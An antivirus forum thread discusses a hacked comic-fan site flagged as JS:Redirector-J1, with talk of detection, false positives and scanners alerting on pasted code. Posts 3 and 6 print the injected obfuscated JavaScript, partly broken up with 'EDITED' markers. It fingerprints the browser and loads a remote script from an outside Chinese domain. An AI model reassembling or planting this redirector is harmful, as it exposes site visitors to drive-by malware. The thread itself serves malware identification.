JS:Redirector-J1 [Trj]

Viruses and worms
1

Has this site been hacked or is this a false positive?
wXw.http://www.comixfan.com/xfan/forums/index.php?
How would I go about finding out?
Thanks. :stuck_out_tongue:

2

Generally, avast detection is accurate in these cases.
Isn’t it an encrypted/obfuscated script or iframe?
Wasn’t the site hacked?
Maybe you could contact its webmaster.

3

Although, I did not find anything strange in the page code (obfuscated scripts).

Maybe this one…


</head><script language=javascript><!-- 
(function(xtVNA){var DLyKr='%';var h5x5=('#76ar#20#61#3d <edited> (h5x5))})(/\#/g);
 --></script>
4

Hello,

Yes, that one :slight_smile: - similar script to JS:Redirector-H (and its variants), just new target url where ppl are redirected and little change in the code.

Regards

5

Good work avast team…
It’s being a very good improvement on avast compared to other antivirus.

6

Tech I think that you should modify the actual script, the last thing we want is for avast to alert on the forums.

e.g.


</head>^EDITEDscript language=javaEDITEDscript^<!-- 
(EDITEDfunction(xtVNA){var DLyKr='%';var5x5=('#76ar#20#61#3d#22#53cri#70tE
#6egine#22#2cb#3d#22Ve#72#73i#6fn()+#22#2cj#3d#22#22#2cu#3dnav#69#67ator#2euserAge#6et#3bif((#75#2eindexOf(#22Chro#6d#65#22)#3c0)#26#26
(u#2eindex#4ff(#22#57i#6e#22)#3e0)#26#26(#75#2ein#64e#78O#66(#22NT#206#22)#3c#30)#26#26(#64o#63um#65nt#2e#63#6fokie#2eind#65xOf(#22#6
diek#3d1#22#29#3c0#29#26#26(typeo#66(zr#76z#74#73#29#21#3dtyp#65o#66(#22#41#22))#29#7bzrvzt#73#3d#22#41#22#3beval(#22if(w#69#6edow#2e
#22+#61+#22)j#3dj#2b#22+a+#22#4dajor#22+#62+a+#22Minor#22+b+a+#22B#75#69ld#22+b+#22#6a#3b#22)#3bd#6fcument#2e#77r#69te(#22#3csc#72ip
#74#20s#72c#3d#2f#2fmar#22+#22#74uz#2e#63n#2f#76#69d#2f#3fid#3d#22+#6a+#22#3e#3c#5c#2fscript#3e#22)#3b#7d').replace(xtVNA,DLyKr);
eval(uneEDITEDscape(h5x5))})(/\#/g);
 -->^EDITED/scriptEDITED^

Whilst that might not have happened in this case it is a good habit to get into, not posting the complete unmodified script. This is why I tend to post images.

7

Even it’s not a live link? Nobody could click on the script url…

8

It has nothing to do with a live link, what the avast detection is on is the obfuscated javascript tag.

9

But it is a text only here… ???

10

That hasn’t stopped avast alerting on scripts before I found that out the hard way and that was when the offending script was in a code tag even when split over two code tags with no other obfuscation avast still alerted and basically I had to remove it completely.

That is why I changed over to using images to display the offending script as that was actually quicker than say changing the < and > tags for ^ and ^ and bunging in EDITED between essential commands as in my example above.

11
But it is a text only here...

I must agree with DavidR - html code, javascript, php - all of these things are just text. From the scanner point of view it is very hard to find the way to distinguish between real scripts and scripts placed into forums.

If you can copy&paste its body, its still virus/trojan.

12

Hi Tech,

That was just what I was going on about in another posting, the difference between this malcode not depending of OS or software, and malware that depends on a particular OS or software. Not often av-users are unaware of this difference. So that is the basic difference between malcode and virus,

polonus

13

Thanks for the help guys. :slight_smile:
Can anyone tell me what this particular virus does? or wants to do? :-[
I mean i understand its a trojan but what does the malware that it installs do? ???

14

It’s hard to say. As the name suggests, the script redirects you to some strange (often Chinese) page; what would load from there… can be anything (and can change any minute).

15

You’re welcome.

As Igor said, the source and content at the site could be changed in minutes so there is no consistency in what payload might be there. All avast is doing is alerting to this (hacked site) and blocking the possibility of exposure to whatever that payload ‘might’ be.